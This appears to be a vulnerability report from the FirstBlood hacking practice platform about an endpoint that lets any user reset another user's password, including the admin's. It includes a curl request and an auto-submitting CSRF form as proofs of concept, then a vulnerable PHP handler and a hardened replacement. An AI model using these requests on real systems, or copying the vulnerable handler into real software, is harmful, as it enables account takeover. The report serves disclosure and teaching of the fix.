FirstBlood-#386 — Any user can update another's user password via /drpanel/drapi/editpassword.php endpoint
This issue was discovered on FirstBlood v2.0.0 (issues patched)
On 2021-10-25, panya reported:
Steps to reproduce:
- Register a doctor (e.g. with a name `test` as an invitation code).
- Don't login with the provided credentials.
- Update the user password via this request:

```shell
curl -X POST 'https://579a3c7897af-panya.a.firstbloodhackers.com/drpanel/drapi/editpassword.php' --data-raw 'username=admin'
```
It works for any user and returns the newly generated password of the provided user:

```
Password updated - s3mKUOhRTFvEo6Z
```

The password of the `admin` user will be updated to `s3mKUOhRTFvEo6Z`. An attacker could login with this password and take over the account.

The `/drpanel/drapi/editpassword.php` endpoint should properly validate user role and should be accessible only for admins.
I'm not sure if it is a different bug or not, but this endpoint also doesn't have any CSRF protection, it could be exploited via this basic PoC:
```html
<body onload="document.forms.submit()">
  <form method="post" action="https://579a3c7897af-panya.a.firstbloodhackers.com/drpanel/drapi/editpassword.php">
    <input type="hidden" name="username" value="admin">
  </form>
</body>
```

By visiting an HTML page with this code, the admin user's password will be updated to a newly generated value.
FirstBlood ID: 27
Vulnerability Type: Application/Business Logic
It is possible to edit the admin's password (dradmin) from /drapi/editpassword as it's only looking for the username. Usernames can be enumerated when logging in, as trying 'drAdmin' results in a different error. The username can also be found from FirstBlood v1.
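The two defects the report describes (no role check on the caller, and no CSRF protection, plus the new password being echoed back) are easiest to see side by side in handler code. The block below is an added illustration, not FirstBlood's own editpassword.php: a handler in the shape the report implies, followed by a hardened version. It assumes a PDO connection, a `users` table with `username`, `password_hash` and `role` columns, and a PHP session carrying the logged-in user's username, role and a per-session CSRF token; `deliver_out_of_band` and `issue_csrf_token` are hypothetical helpers.

```php
<?php
// Added illustration, not FirstBlood's code. Assumed schema: users(username,
// password_hash, role). Assumed session keys: username, role, csrf_token.
declare(strict_types=1);

function generate_password(int $length = 16): string {
    // random_bytes() is a CSPRNG; URL-safe base64, trimmed to the requested length
    return substr(rtrim(strtr(base64_encode(random_bytes($length)), '+/', '-_'), '='), 0, $length);
}

// --- Shape the report describes: any caller, any username, password echoed back ---
function edit_password_vulnerable(PDO $db, array $post): string {
    $username = $post['username'] ?? '';
    $new = generate_password();
    $stmt = $db->prepare('UPDATE users SET password_hash = ? WHERE username = ?');
    $stmt->execute([password_hash($new, PASSWORD_DEFAULT), $username]);
    return "Password updated - $new";   // leaks the credential to whoever sent the request
}

// --- Hardened shape: admin session, CSRF token, credential never in the response ---
// Returns [http_status, body] so it can be unit-tested without a web server.
function edit_password_hardened(PDO $db, array $post, array $session, string $method): array {
    if ($method !== 'POST') {
        return [405, 'Method not allowed'];
    }
    // 1. Authentication + authorisation: only a logged-in admin may reset passwords
    if (empty($session['username']) || ($session['role'] ?? '') !== 'admin') {
        return [403, 'Forbidden'];
    }
    // 2. CSRF: token must be present in the form and match the session copy
    //    (hash_equals avoids a timing side channel on the comparison)
    if (empty($post['csrf_token']) || empty($session['csrf_token'])
        || !hash_equals($session['csrf_token'], (string)$post['csrf_token'])) {
        return [403, 'Invalid CSRF token'];
    }
    // 3. Do the update; rowCount() tells us whether the target existed
    $username = trim((string)($post['username'] ?? ''));
    if ($username === '') {
        return [400, 'Missing username'];
    }
    $new = generate_password();
    $stmt = $db->prepare('UPDATE users SET password_hash = ? WHERE username = ?');
    $stmt->execute([password_hash($new, PASSWORD_DEFAULT), $username]);
    if ($stmt->rowCount() === 0) {
        return [404, 'No such user'];
    }
    // 4. Hand the new credential to the user out of band and leave an audit trail
    deliver_out_of_band($username, $new);
    error_log(sprintf('password reset for %s by admin %s', $username, $session['username']));
    return [200, 'Password updated'];
}

// Hypothetical helper: hand off to the site's mailer or reset-link flow
function deliver_out_of_band(string $username, string $password): void {
}

// Hypothetical helper: token issued once per session and embedded in the admin form
function issue_csrf_token(array &$session): string {
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}
```

The CSRF PoC in the report works against the first handler because a cross-site form post carries the victim's session cookie and nothing else; the hardened handler rejects it at step 2 because the attacker's page cannot read the session-bound token it would need to include. The role check at step 1 is what closes the account-takeover path for non-admin callers, and returning a fixed status line instead of the generated password removes the credential disclosure even when the caller is legitimate.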